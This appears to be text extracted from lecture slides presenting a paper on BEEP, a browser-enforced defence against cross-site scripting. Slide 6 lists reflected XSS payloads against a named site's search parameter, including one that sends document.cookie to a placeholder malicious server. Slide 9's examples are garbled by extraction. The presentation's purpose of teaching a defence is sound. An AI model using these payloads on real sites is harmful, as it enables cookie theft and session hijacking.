Defeating Script Injection Attacks with BrowserEnforced Embedded Policies

1
Defeating Script Injection Attacks with
Browser-Enforced Embedded Policies

• By
• Trevor Jim- ATT Labs Research
• Nikhil Swamy and Michael Hicks- University of
  Maryland, College Park
• Presented by Lauri Marc Ahlman

2
Itinerary

• Explanation and Overview of Cross-Site Scripting
  Attacks (XSS)?
• Examples
• Demonstration
• Solution Proposed by Authors
• What it is
• How it works
• Different Policies
• Implementation

3
Cross Site Scripting

• Typical (simplified) web application login
  scenario
• User sends username and password to server
• Server authenticates user, sends back cookie
• Values stored in cookie are then the only
  authentication tokens used for the remainder of
  the session.
• If an attacker can capture a user's cookie, that
  user's session is vulnerable to being hijacked
• Cross Site Scripting can be used to steal the
  cookie!

4
Cross Site Scripting

• A cross site scripting attack occurs when a third
  party injects a script into a trusted page, and
  that script is run in the user's browser.
• There are two main types of XSS attack
• -Reflected (Non-persistent) attacks
• -Persistent attacks

5
Reflected (Non-persistent) Cross Site Scripting
Attacks

• A website is vulnerable to a reflected XSS attack
  when it embeds part of the url into the page
  without filtering the content
• The script is injected into the page served to
  the user, but is not stored on the server
• Popular in when used with phishing
  attacksDemonstration

6
Scripts used

• http//www.e-flux.com/search?keyword
• 3C/b3E3Cscript3Ealert(22This20is20a20test
  22)
• 3C/script3E3Cb3Eart
• alert(This is a test)
• http//www.e-flux.com/search?keyword
• 3C/b3E3Cscript3Ealert28document.cookie29
• 3C/script3E3Cb3Eart
• alert(document.cookie)
• document.location.replace('http//maliciou
  s-server.com/cookie_monster.cgi?'document.cookie)
  

7
Persistent Cross Site Scripting Attacks

• A persistent cross site scripting attack stores
  the script on the server
• Often used on forums, message boards, and other
  content management systems where users post data
  that is served to other users.Demonstration

8
Other Methods of Preventing XSS Attacks

• Escape encoding
• Encoding as lt and gt would prevent
  people from creating rich content using other
  html tags
• Detecting scripts
• Very difficult due to the wide variety of methods
  to invoke a script

9
Invoking a Script

• code
• code
• code"
• ptcode"
• )"

10
Browser Enforced Embedded Policies (BEEP)?

• Method suggested by authors of paper
• Relies on two basic principles
• Web developer knows what scripts should be run
  from website
• Browser detects all scripts that will be run when
  it parses the page, if it is not detected by
  browser, it cannot be run
• Implemented on web page by developer, as well as
  in browser on client side

11
Browser Enforced Embedded Policies (BEEP)?

• Makes use of Security Hook function in web page
• -Script executed first by the browser
• -Located in the head of the html file
• Every time a script is encountered in the page,
  the security hook is invoked, and it's policy
  applied.
• The authors suggest two distinct policies to be
  used
• -Whitelist
• -DOM Sandboxing

12
Whitelist Policy

• Hook function includes MD of every script on page
• When the browser encounters a script, browser
  calculates the MD of the script, and hook
  compares to the saved Mds.
• If there is a match, the script is executed,
  otherwise it is not.
• The authors used SHA-1 for hashing

13
DOM Sandboxing

• Black list approach
• Instead of designating which scripts should be
  run, designates dangerous sections of the code
• Designates sections of the code as non-executable

14
Client Side Implementation

• The authors were able to modify Three browsers
  with relative ease
• Konqueror
• 650 lines of code
• Safari
• 650 lines of code
• Opera
• 79 lines of code
• Also added a SHA-1 implementation to each

15
Questions???
16

• Thank you very much.